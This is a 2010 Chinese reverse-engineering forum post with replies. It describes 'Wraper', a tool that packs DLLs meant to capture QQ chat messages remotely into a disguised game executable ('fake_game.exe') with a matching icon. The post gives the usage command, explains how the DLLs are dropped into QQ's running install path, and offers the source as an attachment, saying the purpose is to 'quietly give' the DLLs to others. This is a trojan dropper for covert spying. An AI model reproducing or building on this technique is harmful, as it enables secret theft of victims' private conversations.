首页
社区
课程
招聘
[原创]QQ聊天信息远程获取一点小改进
发表于: 2010-11-14 23:40 8791

[原创]QQ聊天信息远程获取一点小改进

2010-11-14 23:40
8791

本贴是在看了踏雪流云的《利用qq2010聊天信息获取,打造自己的远程控制》制作的QQ聊天信息远程获取小工具。请参考着阅读。
http://bbs.pediy.com/showthread.php?p=888526#post888526

工具Wraper的功能是把im32.dll,msimg32.dll,abc.exe(任意程序)打包成一个程序,为了让打包后的能释放执行程序,还需要用到一个header.exe
使用方法例如:
Wraper.exe -h Header.exe -g game.exe -d im32.dll -d msimg32.dll -o fake_game.exe

fake_game.exe运行时把game.exe释放到temp目录下并执行,把im32.dll,msimg32.dll释放到QQ安装路径下(qq是绿色软件,注册表中的安装路径不一定正确,这里用的方法是枚举进程,获取image path的方法,所以只有QQ在运行的时候才能找到QQ的image path)

为了能让fake_game.exe的图标和game.exe的图标一样,还需要修正资源节的信息。

总结下Wraper作用下:header.exe+abc.exe+n个xyx.dll=fake_abc.exe
反正就是把我们需要‘送’给别人dll,打包成游戏之类的东西,悄悄的送给别人。

这里上传wraper和header的源代码。
WraperHeader获取聊天记录.rar
其他代码可以在踏雪流云帖子中下载。


[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

上传的附件:
收藏
免费 7
支持
分享
最新回复 (9)
雪    币: 236
活跃值: (26)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
强,竟然研究出来了。
2010-11-15 07:10
0
雪    币: 440
活跃值: (119)
能力值: ( LV6,RANK:80 )
在线值:
发帖
回帖
粉丝
3
嘿嘿,帮你顶一下~~~
2010-11-15 10:19
0
雪    币: 170
活跃值: (90)
能力值: ( LV12,RANK:210 )
在线值:
发帖
回帖
粉丝
4
Wraper.exe -h Header.exe -g game.exe -d im32.dll -d msimg32.dll -o fake_game.exe

这么长。。。
2010-11-17 18:32
0
雪    币: 170
活跃值: (90)
能力值: ( LV12,RANK:210 )
在线值:
发帖
回帖
粉丝
5
举一反三  不错
2010-11-17 18:34
0
雪    币: 170
活跃值: (90)
能力值: ( LV12,RANK:210 )
在线值:
发帖
回帖
粉丝
6
TX具有极大的挖掘潜力
2010-11-17 18:46
0
雪    币: 176
活跃值: (267)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
7
不成功啊 兄弟  !!!我找人测试 了!!
2010-11-17 19:23
0
雪    币: 201
活跃值: (20)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
8
这个不一定 能收到记录
2010-11-18 15:22
0
雪    币: 585
活跃值: (573)
能力值: ( LV13,RANK:290 )
在线值:
发帖
回帖
粉丝
9
标记备查标记备查
2010-12-9 10:07
0
雪    币: 241
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
10
什么时候看雪这里下载附件也要扣钱了。
2010-12-9 11:15
0
游客
登录 | 注册 方可回帖
返回
//